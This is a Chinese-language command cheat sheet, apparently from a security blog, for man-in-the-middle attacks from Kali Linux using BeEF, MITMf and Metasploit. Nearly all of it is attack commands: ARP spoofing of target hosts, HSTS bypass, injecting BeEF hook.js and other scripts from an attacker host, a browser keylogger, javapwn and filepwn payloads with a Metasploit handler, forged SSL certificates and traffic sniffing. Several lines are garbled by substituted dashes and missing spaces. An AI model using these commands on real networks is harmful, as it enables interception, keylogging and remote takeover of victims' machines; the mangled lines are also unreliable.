注:首先将默认浏览器的IP地址设为本机回环代理地址,IP格式:127.0.0.1,Port:8080,勾选Socks5,勾选Remote DNS,设置完成!
root@kali:~# cd /user/share/beef-xss
root@kali:~# beef-xss
注:开启后自动跳转到Beef登录界面,链接:http://127.0.0.1/3000/ui/authentication,默认用户为:beef密码为:beef,通过浏览器浏览网页,Beef会通过Cookies会话截取各指纹,插件等详细信息!
root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf.git /root/mitmf/
root@kali:~# cd /root/mitmf/
root@kali: /root/mitmf# python mitmf.py -i wlan0
嗅探SSL协议传输数据包:
root@kali: /root/mitmf# python mitmf.py -i eth0 --hsts --spoof --arp --gateway 10.0.0.1 --target 10.0.0.18
Screenshotter模块对目标浏览器截屏:
root@kali: /root/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.100 --screen
Inject框架模块注入功能:
root@kali: /root/mitmf# mitmf -i eth0 --spoof --arp --gateway 192.168.1.2 --target 192.168.1.129 --inject --html-url http://www.freebuf.com
注入js:
root@kali: /root/mitmf# mitmf -i eth0 --spoof --arp --gateway 192.168.1.2 --target 192.168.1.129 --inject --js-url http://linvex.xxx.cn/test.js
键盘记录js:
root@kali: /root/mitmf# mitmf -i eth0 --spoof –-arp –-gateway 192.168.1.1 –-target 192.168.1.114 --jskeylogger
Miti中间人攻击:
root@kali: /root/mitmf# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject –js-url http://192.168.1.110:3000/hook.js
开启Metasploit:
root@kali:~# msfconsole
载入msgrpc模块:
msf5 > load msgrpc Pass=abc123
利用javapwn模块攻击:
root@kali: /root/mitmf# mitmf -i eth0 --spoof --gateway 192.168.217.2 --target 192.168.217.129 --javapwn --msfip 192.168.1.100
msf5 > use exploit/multi/handler
msf5 (exploit/multi/handler) > set LHOST 192.168.217.137
msf5 (exploit/multi/handler) > set LPORT 1447
msf5 (exploit/multi/handler) > run
注入到html页面:
root@kali: /root/mitmf# ./mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --inject --html-url http://192.168.1.107:3000/demos/butcher/index.html
注入js与beef-xss结合:
root@kali: /root/mitmf# ./mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --inject --js-url http://192.168.1.107:3000/hook.js
Screenshotter模块对目标浏览器截屏:
root@kali: /root/mitmf# ./mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --screen
中间人钓鱼:
root@kali: /root/mitmf# ./mitmf.py --iface eth0 --spoof --gateway 192.168.1.1 --target 192.168.1.200 --filepwn
伪造SSL MITIM证书:
root@kali:~# openssl genrsa −out etter.ssl.crt 1024
root@kali:~# openssl req −new−keyetter.ssl.crt −out tmp.csr
root@kali:~# openssl x509 −req −days 1825 −in tmp.csr −signkey etter.ssl.crt−out tmp.new
root@kali:~# cat tmp.new>>etter.ssl.crt
root@kali:~# rm −f tmp.newtmp.csr
监听网卡流量:
root@kali:~# tcpdump -i wlan0
监听回环流量:
root@kali:~# tcpdump -i lo
网友评论